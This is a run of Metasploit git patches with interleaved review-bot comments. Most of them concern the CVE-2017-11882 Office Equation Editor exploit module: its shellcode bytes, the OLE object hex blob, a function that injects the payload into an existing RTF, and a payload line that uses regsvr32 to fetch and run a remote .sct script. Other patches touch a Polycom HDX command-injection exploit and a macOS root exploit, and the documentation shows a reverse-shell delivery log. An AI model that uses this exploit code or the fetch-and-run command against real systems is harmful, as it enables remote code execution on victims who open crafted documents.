+ shellcode << "\x00\x00" # d: 00 00 add BYTE PTR [eax],al
+ shellcode << "\x00\xc8" # f: 00 c8 add al,cl
+ shellcode << "\xa7" # 11: a7 cmps DWORD PTR ds:[esi],DWORD PTR es:[edi]
+ shellcode << "\\" # 12: 5c pop esp
+ shellcode << "\x00\xc4" # 13: 00 c4 add ah,al
+ shellcode << "\xee" # 15: ee out dx,al
+ shellcode << "[" # 16: 5b pop ebx
+ shellcode << "\x00\x00" # 17: 00 00 add BYTE PTR [eax],al
+ shellcode << "\x00\x00" # 19: 00 00 add BYTE PTR [eax],al
+ shellcode << "\x00\x03" # 1b: 00 03 add BYTE PTR [ebx],al
+ shellcode << "\x01\x01" # 1d: 01 01 add DWORD PTR [ecx],eax
+ shellcode << "\x03\n" # 1f: 03 0a add ecx,DWORD PTR [edx]
+ shellcode << "\n\x01" # 21: 0a 01 or al,BYTE PTR [ecx]
+ shellcode << "\x08ZZ" # 23: 08 5a 5a or BYTE PTR [edx+0x5a],bl
+ shellcode << "\xB8\x44\xEB\x71\x12" # 26: b8 44 eb 71 12 mov eax,0x1271eb44
+ shellcode << "\xBA\x78\x56\x34\x12" # 2b: ba 78 56 34 12 mov edx,0x12345678
+ shellcode << "\x31\xD0" # 30: 31 d0 xor eax,edx
+ shellcode << "\x8B\x08" # 32: 8b 08 mov ecx,DWORD PTR [eax]
+ shellcode << "\x8B\x09" # 34: 8b 09 mov ecx,DWORD PTR [ecx]
+ shellcode << "\x8B\x09" # 36: 8b 09 mov ecx,DWORD PTR [ecx]
+ shellcode << "\x66\x83\xC1\x3C" # 38: 66 83 c1 3c add cx,0x3c
+ shellcode << "\x31\xDB" # 3c: 31 db xor ebx,ebx
+ shellcode << "\x53" # 3e: 53 push ebx
+ shellcode << "\x51" # 3f: 51 push ecx
+ shellcode << "\xBE\x64\x3E\x72\x12" # 40: be 64 3e 72 12 mov esi,0x12723e64
+ shellcode << "\x31\xD6" # 45: 31 d6 xor esi,edx
+ shellcode << "\xFF\x16" # 47: ff 16 call DWORD PTR [esi]
+ shellcode << "\x53" # 49: 53 push ebx
+ shellcode << "\x66\x83\xEE\x4C" # 4a: 66 83 ee 4c sub si,0x4c
+ shellcode << "\xFF\x10" # 4e: ff 10 call DWORD PTR [eax]
+ shellcode << "\x90" # 50: 90 nop
+ shellcode << "\x90" # 50: 90 nop
 footer = '0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000'
 footer << '4500710075006100740069006F006E0020004E006100740069007600650000000'
From c788e4e54066c9cc99a44a261a7a07bfa53199e0 Mon Sep 17 00:00:00 2001
From: Austin <30811388+realoriginal@users.noreply.github.com>
Date: Fri, 1 Dec 2017 11:36:03 -0500
Subject: [PATCH 240/254] Update office_ms17_11882.rb
---
 .../windows/fileformat/office_ms17_11882.rb | 181 ++++++++++--------
 1 file changed, 104 insertions(+), 77 deletions(-)
diff --git a/modules/exploits/windows/fileformat/office_ms17_11882.rb b/modules/exploits/windows/fileformat/office_ms17_11882.rb
index 6aafc49c14..291fe04045 100644
--- a/modules/exploits/windows/fileformat/office_ms17_11882.rb
+++ b/modules/exploits/windows/fileformat/office_ms17_11882.rb
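Review bot: The two trailing `nop` lines both carry the offset `# 50:`; the second byte sits at `# 51:`. More importantly, the comments present the first 0x26 bytes as x86 instructions (`sbb al,0x0`, `les ebp,...`, `out dx,al`), but that region looks like the Equation Native header rather than code — the leading `\x1c\x00\x00\x00` reads as a 28-byte header length and `\x03\x01\x01\x03` as an MTEF version record — so a maintainer reading the disassembly would be misled about what is actually executed. Consider annotating that prefix as header fields (e.g. `# EQNOLEFILEHDR / MTEF header, not executed`) and keeping the instruction listing only from `\xB8\x44\xEB\x71\x12` onward, where the instruction stream appears to begin. The enclosing `generate_rtf` starts before this hunk and continues after it.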
@@ -46,88 +46,115 @@ class MetasploitModule < Msf::Exploit::Remote
 ))
 register_options([
- OptString.new("FILENAME", [true, "Filename to save as", "msf.rtf"])
+ OptString.new("FILENAME", [true, "Filename to save as, or inject", "msf.rtf"]),
+ OptString.new("FOLDER_PATH", [false, "Path to file to inject", nil])
 ])
 end
+ def retrieve_header(filename)
+ if (not datastore['FOLDER_PATH'].nil?)
+ path = "#{datastore['FOLDER_PATH']}/#{datastore['FILENAME']}"
+ else
+ path = nil
+ end
+ if (not path.nil?)
+ if ::File.file?(path)
+ File.open(path, 'rb') do |fd|
+ header = fd.read(fd.stat.size).split('{\*\datastore').first
+ header = header.to_s # otherwise I get nil class...
+ print_status("Injecting #{path}...")
+ return header
+ end
+ else
+ header = '{\rtf1\ansi\ansicpg1252\deff0\nouicompat\deflang1033{\fonttbl{\f0\fnil\fcharset0 Calibri;}}' + "\n"
+ header << '{\*\generator Riched20 6.3.9600}\viewkind4\uc1' + "\n"
+ header << '\pard\sa200\sl276\slmult1\f0\fs22\lang9'
+ end
+ else
+ header = '{\rtf1\ansi\ansicpg1252\deff0\nouicompat\deflang1033{\fonttbl{\f0\fnil\fcharset0 Calibri;}}' + "\n"
+ header << '{\*\generator Riched20 6.3.9600}\viewkind4\uc1' + "\n"
+ header << '\pard\sa200\sl276\slmult1\f0\fs22\lang9'
+ end
+ return header
+ end
+
 def generate_rtf
- header = '{\rtf1\ansi\ansicpg1252\deff0\nouicompat\deflang1033{\fonttbl{\f0\fnil\fcharset0 Calibri;}}' + "\n"
- header << '{\*\generator Riched20 6.3.9600}\viewkind4\uc1' + "\n"
- header << '\pard\sa200\sl276\slmult1\f0\fs22\lang9{\object\objemb\objupdate{\*\objclass Equation.3}\objw380\objh260{\*\objdata '
- header << '01050000020000000b0000004571756174696f6e2e33000000000000000000000'
- header << 'c0000d0cf11e0a1b11ae1000000000000000000000000000000003e000300feff'
- header << '09000600000000000000000000000100000001000000000000000010000002000'
- header << '00001000000feffffff0000000000000000ffffffffffffffffffffffffffffff'
- header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
- header << 
'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' - header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' - header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' - header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' - header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' - header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' - header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' - header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' - header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' - header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' - header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' - header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffdffffff040' - header << '00000fefffffffefffffffeffffffffffffffffffffffffffffffffffffffffff' - header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' - header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' - header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' - header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' - header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' - header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' - header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' - header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' - header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' - header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' - header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' - header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' - header << 
'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' - header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' - header << 'ffffffffffffffffffffffffffffffffffffff52006f006f007400200045006e0' - header << '07400720079000000000000000000000000000000000000000000000000000000' - header << '00000000000000000000000000000000000016000500ffffffffffffffff02000' - header << '00002ce020000000000c0000000000000460000000000000000000000008020ce' - header << 'a5613cd30103000000000200000000000001004f006c006500000000000000000' - header << '00000000000000000000000000000000000000000000000000000000000000000' - header << '000000000000000000000000000000000a000201ffffffffffffffffffffffff0' - header << '00000000000000000000000000000000000000000000000000000000000000000' - header << '000000000000001400000000000000010043006f006d0070004f0062006a00000' - header << '00000000000000000000000000000000000000000000000000000000000000000' - header << '0000000000000000000000000000120002010100000003000000ffffffff00000' - header << '00000000000000000000000000000000000000000000000000000000000000000' - header << '0001000000660000000000000003004f0062006a0049006e0066006f000000000' - header << '00000000000000000000000000000000000000000000000000000000000000000' - header << '00000000000000000000000012000201ffffffff04000000ffffffff000000000' - header << '00000000000000000000000000000000000000000000000000000000000000003' - header << '0000000600000000000000feffffff02000000fefffffffeffffff05000000060' - header << '0000007000000feffffffffffffffffffffffffffffffffffffffffffffffffff' - header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' - header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' - header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' - header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' - header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' - header << 
'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' - header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' - header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' - header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' - header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' - header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' - header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' - header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' - header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' - header << 'ffffff01000002080000000000000000000000000000000000000000000000000' - header << '00000000000000000000000000000000000000000000000000000000000000000' - header << '00000100feff030a0000ffffffff02ce020000000000c00000000000004617000' - header << '0004d6963726f736f6674204571756174696f6e20332e30000c00000044532045' - header << '71756174696f6e000b0000004571756174696f6e2e3300f439b27100000000000' - header << '00000000000000000000000000000000000000000000000000000000000000000' - header << "00000300040000000000000000000000000000000000000000000000000000000" - header << "000000000000000000000000000000000000000000000000000000000000000\n" + header = retrieve_header(datastore['FILENAME']) + object_class = '{\object\objemb\objupdate{\*\objclass Equation.3}\objw380\objh260{\*\objdata ' + object_class << '01050000020000000b0000004571756174696f6e2e33000000000000000000000' + object_class << 'c0000d0cf11e0a1b11ae1000000000000000000000000000000003e000300feff' + object_class << '09000600000000000000000000000100000001000000000000000010000002000' + object_class << '00001000000feffffff0000000000000000ffffffffffffffffffffffffffffff' + object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + object_class << 
'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffdffffff040' + object_class << '00000fefffffffefffffffeffffffffffffffffffffffffffffffffffffffffff' + object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + object_class << 
'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + object_class << 'ffffffffffffffffffffffffffffffffffffff52006f006f007400200045006e0' + object_class << '07400720079000000000000000000000000000000000000000000000000000000' + object_class << '00000000000000000000000000000000000016000500ffffffffffffffff02000' + object_class << '00002ce020000000000c0000000000000460000000000000000000000008020ce' + object_class << 'a5613cd30103000000000200000000000001004f006c006500000000000000000' + object_class << '00000000000000000000000000000000000000000000000000000000000000000' + object_class << '000000000000000000000000000000000a000201ffffffffffffffffffffffff0' + object_class << '00000000000000000000000000000000000000000000000000000000000000000' + object_class << '000000000000001400000000000000010043006f006d0070004f0062006a00000' + object_class << '00000000000000000000000000000000000000000000000000000000000000000' + object_class << '0000000000000000000000000000120002010100000003000000ffffffff00000' + object_class << '00000000000000000000000000000000000000000000000000000000000000000' + object_class << '0001000000660000000000000003004f0062006a0049006e0066006f000000000' + object_class << '00000000000000000000000000000000000000000000000000000000000000000' + object_class << '00000000000000000000000012000201ffffffff04000000ffffffff000000000' + object_class << '00000000000000000000000000000000000000000000000000000000000000003' + object_class << '0000000600000000000000feffffff02000000fefffffffeffffff05000000060' + object_class << '0000007000000feffffffffffffffffffffffffffffffffffffffffffffffffff' + object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + object_class << 
'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + object_class << 'ffffff01000002080000000000000000000000000000000000000000000000000' + object_class << '00000000000000000000000000000000000000000000000000000000000000000' + object_class << '00000100feff030a0000ffffffff02ce020000000000c00000000000004617000' + object_class << '0004d6963726f736f6674204571756174696f6e20332e30000c00000044532045' + object_class << '71756174696f6e000b0000004571756174696f6e2e3300f439b27100000000000' + object_class << '00000000000000000000000000000000000000000000000000000000000000000' + object_class << "00000300040000000000000000000000000000000000000000000000000000000" + object_class << "000000000000000000000000000000000000000000000000000000000000000\n" shellcode = "\x1c\x00" # 0: 1c 00 sbb al,0x0 
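Review bot: `retrieve_header(filename)` ignores its `filename` argument and reads `datastore['FILENAME']` instead, and the default RTF header is built twice in identical branches (the `else` of `::File.file?(path)` and the outer `else`), so the method is about three times longer than it needs to be. The `File.open` inside it is also inconsistent with the `::File.file?` check just above, and `header = header.to_s` papers over the one case where `split('{\*\datastore').first` returns nil, an empty file. A guard-clause version below keeps the same results — default header unless FOLDER_PATH is set and the file exists, otherwise everything before the first `{\*\datastore` group — with `::File.join` replacing the hand-built `"#{...}/#{...}"` path; the caller already passes `datastore['FILENAME']`, so using the parameter changes nothing. `generate_rtf` continues past the end of this hunk.
```ruby
  def retrieve_header(filename)
    default_header = '{\rtf1\ansi\ansicpg1252\deff0\nouicompat\deflang1033{\fonttbl{\f0\fnil\fcharset0 Calibri;}}' + "\n"
    default_header << '{\*\generator Riched20 6.3.9600}\viewkind4\uc1' + "\n"
    default_header << '\pard\sa200\sl276\slmult1\f0\fs22\lang9'
    return default_header if datastore['FOLDER_PATH'].nil?

    path = ::File.join(datastore['FOLDER_PATH'], filename)
    return default_header unless ::File.file?(path)

    print_status("Injecting #{path}...")
    # Keep the document up to (not including) its first {\*\datastore group; to_s covers an empty file
    ::File.binread(path).split('{\*\datastore').first.to_s
  end
  # … unchanged: generate_rtf and the object_class hex blob …
```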
@@ -215,7 +242,7 @@ class MetasploitModule < Msf::Exploit::Remote
 payload += "\x00" * 2
 payload += "regsvr32 /s /n /u /i:#{get_uri}.sct scrobj.dll"
 payload = (payload + ("\x00" * (197 - payload.length))).unpack('H*').first
- payload = header + payload + footer
+ payload = header + object_class + payload + footer
 payload
 end
From fd1681edd9dfb041871ace9d69220d12d0089843 Mon Sep 17 00:00:00 2001
From: Metasploit
Date: Fri, 1 Dec 2017 10:04:07 -0800
Subject: [PATCH 241/254] Bump version of framework to 4.16.22
---
 Gemfile.lock | 2 +-
 lib/metasploit/framework/version.rb | 2 +-
 2 files changed, 2 insertions(+), 2 deletions(-)
diff --git a/Gemfile.lock b/Gemfile.lock
index a507211199..02a3d0af4e 100644
--- a/Gemfile.lock
+++ b/Gemfile.lock
@@ -1,7 +1,7 @@
 PATH
 remote: .
 specs:
- metasploit-framework (4.16.21)
+ metasploit-framework (4.16.22)
 actionpack (~> 4.2.6)
 activerecord (~> 4.2.6)
 activesupport (~> 4.2.6)
diff --git a/lib/metasploit/framework/version.rb b/lib/metasploit/framework/version.rb
index 9ae49f17d5..ce52cf1258 100644
--- a/lib/metasploit/framework/version.rb
+++ b/lib/metasploit/framework/version.rb
@@ -30,7 +30,7 @@ module Metasploit
 end
 end
- VERSION = "4.16.21"
+ VERSION = "4.16.22"
 MAJOR, MINOR, PATCH = VERSION.split('.').map { |x| x.to_i }
 PRERELEASE = 'dev'
 HASH = get_hash
From 06334aa2bd6d5ae7c8ede0caa8cd2c250288506f Mon Sep 17 00:00:00 2001
From: Austin <30811388+realoriginal@users.noreply.github.com>
Date: Mon, 4 Dec 2017 11:05:01 -0500
Subject: [PATCH 242/254] Update polycom_hdx_traceroute_exec.rb
---
 modules/exploits/unix/misc/polycom_hdx_traceroute_exec.rb | 1 +
 1 file changed, 1 insertion(+)
diff --git a/modules/exploits/unix/misc/polycom_hdx_traceroute_exec.rb b/modules/exploits/unix/misc/polycom_hdx_traceroute_exec.rb
index 033d433d37..de248ac09a 100644
--- a/modules/exploits/unix/misc/polycom_hdx_traceroute_exec.rb
+++ b/modules/exploits/unix/misc/polycom_hdx_traceroute_exec.rb
@@ -29,6 +29,7 @@ class MetasploitModule < Msf::Exploit::Remote
 'License' => MSF_LICENSE,
 'Platform' => 'unix',
 'Arch' => ARCH_CMD,
+ 'Stance' => Msf::Exploit::Stance::Aggressive,
 'Targets' => [[ 'Automatic', {} ]],
 'Payload' => {
 'Space' => 8000,
From 7edab268f504fb0fe397acf792d34870d8c5d24a Mon Sep 17 00:00:00 2001
From: Brent Cook
Date: Mon, 4 Dec 2017 12:47:40 -0600
Subject: [PATCH 243/254] handle case-insensitive password, fix received
---
 modules/exploits/unix/misc/polycom_hdx_traceroute_exec.rb | 6 +++---
 1 file changed, 3 insertions(+), 3 deletions(-)
diff --git a/modules/exploits/unix/misc/polycom_hdx_traceroute_exec.rb b/modules/exploits/unix/misc/polycom_hdx_traceroute_exec.rb
index de248ac09a..f95797d672 100644
--- a/modules/exploits/unix/misc/polycom_hdx_traceroute_exec.rb
+++ b/modules/exploits/unix/misc/polycom_hdx_traceroute_exec.rb
@@ -74,9 +74,9 @@ class MetasploitModule < Msf::Exploit::Remote
 sock = connect
 Rex.sleep(2)
 banner = sock.get_once
- vprint_status("Recieved #{banner.length} bytes from service")
+ vprint_status("Received #{banner.length} bytes from service")
 vprint_line("#{banner}")
- if banner =~ /password/
+ if banner =~ /password/i
 print_status("Authentication enabled on device, authenticating with target...")
 if datastore['PASSWORD'].nil?
 print_error("#{peer} - Please supply a password to authenticate with")
@@ -111,7 +111,7 @@ class MetasploitModule < Msf::Exploit::Remote
 if datastore['VERBOSE']
 Rex.sleep(2)
 resp = sock.get_once
- vprint_status("Recieved #{resp.length} bytes in response")
+ vprint_status("Received #{resp.length} bytes in response")
 vprint_line(resp)
 end
From b7f17f5519521c4d4716c26e0c9ced5c6342bc4a Mon Sep 17 00:00:00 2001
From: Austin <30811388+realoriginal@users.noreply.github.com>
Date: Mon, 4 Dec 2017 16:41:27 -0500
Subject: [PATCH 244/254] fix documentation
---
 .../exploit/windows/fileformat/office_ms17_11882.md | 13 +++++--------
 1 file changed, 5 insertions(+), 8 deletions(-)
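Review bot: `vprint_status("Received #{banner.length} bytes from service")` still dereferences `banner` unguarded; if `sock.get_once` returns nil because nothing arrived within the wait, the spelling fix does not prevent the `NoMethodError` on `.length`, and the same applies to `resp.length` in the `@@ -111,7 +111,7 @@` hunk. Coercing before use, `banner = sock.get_once.to_s` (and `resp = sock.get_once.to_s`), makes an empty read report 0 bytes and lets the `/password/i` match simply fail. The enclosing method starts before this hunk and continues after it.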
diff --git a/documentation/modules/exploit/windows/fileformat/office_ms17_11882.md b/documentation/modules/exploit/windows/fileformat/office_ms17_11882.md index b6b3ae81c6..b1b73d0468 100644 --- a/documentation/modules/exploit/windows/fileformat/office_ms17_11882.md +++ b/documentation/modules/exploit/windows/fileformat/office_ms17_11882.md @@ -1,5 +1,5 @@ -Office products within the last 17 years allow an attacker to execute arbitrary commands through memory corruption in Office documents. This occurs in how MS office fails to properly handle OLE objects in memory. Requires an victim -to open an MS `.rtf` file. In addition for the payload to be executed, the user must not open as read-only. Otherwise requires no interaction beyond that from the user. + +Module exploits a flaw in how the Equation Editor that allows an attacker to execute arbitrary code in RTF files without interaction. The vulnerability is caused by the Equation Editor, to which fails to properly handle OLE objects in memory. ## Vulnerable Application @@ -24,18 +24,15 @@ Filename to output, and location to which should be written. ``` msf > use exploit/windows/fileformat/office_ms17_11882 -msf exploit(office_ms17_11882) > set FILENAME /home/mumbai/file.rtf +msf exploit(office_ms17_11882) > set FILENAME msf.rtf FILENAME => /home/mumbai/file.rtf msf exploit(office_ms17_11882) > set LHOST ens3 LHOST => ens3 msf exploit(office_ms17_11882) > set LPORT 35116 LPORT => 35116 msf exploit(office_ms17_11882) > run -[*] Exploit running as background job 0. - -[*] Started reverse TCP handler on 192.168.0.11:35116 -msf exploit(office_ms17_11882) > [*] Using URL: http://0.0.0.0:8080/e08qBLfVxgaJZPo -[*] Local IP: http://192.168.0.11:8080/e08qBLfVxgaJZPo +[*] Using URL: http://0.0.0.0:8080/BUY0DYgc +[*] Local IP: http://192.1668.0.11:8080/BUY0DYgc [*] Server started. [*] 192.168.0.24 office_ms17_11882 - Handling initial request from 192.168.0.24 [*] 192.168.0.24 office_ms17_11882 - Stage two requestd, sending 
From b96dac28d520a51ac655e227bec0c4b8bae84106 Mon Sep 17 00:00:00 2001
From: Austin <30811388+realoriginal@users.noreply.github.com>
Date: Mon, 4 Dec 2017 16:42:41 -0500
Subject: [PATCH 245/254] fix info segment
---
 modules/exploits/windows/fileformat/office_ms17_11882.rb | 9 ++++-----
 1 file changed, 4 insertions(+), 5 deletions(-)
diff --git a/modules/exploits/windows/fileformat/office_ms17_11882.rb b/modules/exploits/windows/fileformat/office_ms17_11882.rb
index 291fe04045..9dc87de6a8 100644
--- a/modules/exploits/windows/fileformat/office_ms17_11882.rb
+++ b/modules/exploits/windows/fileformat/office_ms17_11882.rb
@@ -16,11 +16,10 @@ class MetasploitModule < Msf::Exploit::Remote
 super(update_info(info,
 'Name' => 'Microsoft Office CVE-2017-11882',
 'Description' => %q{
- Module exploits a flaw in the Equation Editor, developed
- in 2000, that allowed any OLE object to execute in a separate
- address space. Compared to original PoC, allows for a command within
- a length of 109 bytes to be executed Affects Microsoft Office word for the latest
- 17 years.
+ Module exploits a flaw in how the Equation Editor that
+ allows an attacker to execute arbitrary code in RTF files without
+ interaction. The vulnerability is caused by the Equation Editor,
+ to which fails to properly handle OLE objects in memory.
 },
 'Author' => ['mumbai', 'embedi'],
 'License' => MSF_LICENSE,
From a27bb38d519759149bdb5c6100781da2f2341725 Mon Sep 17 00:00:00 2001
From: Brent Cook
Date: Mon, 4 Dec 2017 18:25:18 -0600
Subject: [PATCH 246/254] add authors
---
 modules/exploits/osx/local/root_no_password.rb | 4 ++++
 1 file changed, 4 insertions(+)
diff --git a/modules/exploits/osx/local/root_no_password.rb b/modules/exploits/osx/local/root_no_password.rb
index 2fc91f8fe7..57588fafce 100644
--- a/modules/exploits/osx/local/root_no_password.rb
+++ b/modules/exploits/osx/local/root_no_password.rb
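Review bot: The replacement description is ungrammatical: `Module exploits a flaw in how the Equation Editor that allows an attacker to execute arbitrary code` has no main clause after `how the Equation Editor`, and `to which fails to properly handle OLE objects` should read `which fails to properly handle OLE objects`. A wording that keeps the same claims: `This module exploits a flaw in the Equation Editor that allows an attacker to execute arbitrary code from an RTF file without interaction; the Equation Editor fails to properly handle OLE objects in memory.` The same text is carried into the `.md` documentation in the previous patch, so both should be corrected together.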
@@ -26,6 +26,10 @@ class MetasploitModule < Msf::Exploit::Local
 ],
 'Platform' => 'osx',
 'Arch' => ARCH_X64,
+ 'Author' => [
+ 'chethan177', # earliest public discovery
+ 'timwr', # Metasploit module
+ ],
 'DefaultOptions' =>
 {
 'PAYLOAD' => 'osx/x64/meterpreter_reverse_tcp',
From b13f4e25e1c8cccad9ba0577768eafdb83be407e Mon Sep 17 00:00:00 2001
From: Brent Cook
Date: Mon, 4 Dec 2017 18:32:31 -0600
Subject: [PATCH 247/254] thanks for making this well-known
---
 modules/exploits/osx/local/root_no_password.rb | 1 +
 1 file changed, 1 insertion(+)
diff --git a/modules/exploits/osx/local/root_no_password.rb b/modules/exploits/osx/local/root_no_password.rb
index 57588fafce..ff11728624 100644
--- a/modules/exploits/osx/local/root_no_password.rb
+++ b/modules/exploits/osx/local/root_no_password.rb
@@ -28,6 +28,7 @@ class MetasploitModule < Msf::Exploit::Local
 'Arch' => ARCH_X64,
 'Author' => [
 'chethan177', # earliest public discovery
+ 'lemiorhan', # making this well-known via Twitter
 'timwr', # Metasploit module
 ],
 'DefaultOptions' =>
From adba277be0290d98c3b7044a749726cb6ad56f2a Mon Sep 17 00:00:00 2001
From: William Webb
Date: Mon, 4 Dec 2017 16:57:48 -0800
Subject: [PATCH 248/254] axe errant spaces at EOL
---
 modules/exploits/windows/fileformat/office_ms17_11882.rb | 6 +++---
 1 file changed, 3 insertions(+), 3 deletions(-)
diff --git a/modules/exploits/windows/fileformat/office_ms17_11882.rb b/modules/exploits/windows/fileformat/office_ms17_11882.rb
index 9dc87de6a8..ec5b951c8d 100644
--- a/modules/exploits/windows/fileformat/office_ms17_11882.rb
+++ b/modules/exploits/windows/fileformat/office_ms17_11882.rb
@@ -16,9 +16,9 @@ class MetasploitModule < Msf::Exploit::Remote
 super(update_info(info,
 'Name' => 'Microsoft Office CVE-2017-11882',
 'Description' => %q{
- Module exploits a flaw in how the Equation Editor that
- allows an attacker to execute arbitrary code in RTF files without
- interaction. The vulnerability is caused by the Equation Editor,
+ Module exploits a flaw in how the Equation Editor that
+ allows an attacker to execute arbitrary code in RTF files without
+ interaction. The vulnerability is caused by the Equation Editor,
 to which fails to properly handle OLE objects in memory.
 },
 'Author' => ['mumbai', 'embedi'],
From 14226c5f3353bf7b5788658d33301b92d46e0fe4 Mon Sep 17 00:00:00 2001
From: Austin <30811388+realoriginal@users.noreply.github.com>
Date: Mon, 4 Dec 2017 20:58:36 -0500
Subject: [PATCH 249/254] missing docs on options
Missed fixes on documentation
---
 .../modules/exploit/windows/fileformat/office_ms17_11882.md | 5 ++++-
 1 file changed, 4 insertions(+), 1 deletion(-)
diff --git a/documentation/modules/exploit/windows/fileformat/office_ms17_11882.md b/documentation/modules/exploit/windows/fileformat/office_ms17_11882.md
index b1b73d0468..51f8bd7813 100644
--- a/documentation/modules/exploit/windows/fileformat/office_ms17_11882.md
+++ b/documentation/modules/exploit/windows/fileformat/office_ms17_11882.md
@@ -17,7 +17,10 @@ Module exploits a flaw in how the Equation Editor that allows an attacker to exe
 ## Options
 ### FILENAME
-Filename to output, and location to which should be written.
+Filename to output & if injecting a file, the file to inject
+
+### FOLDER_PATH
+Path to filename to inject
 ## Example
From c15f37934379af99e0b01e99dd7ee003bba7b8f6 Mon Sep 17 00:00:00 2001
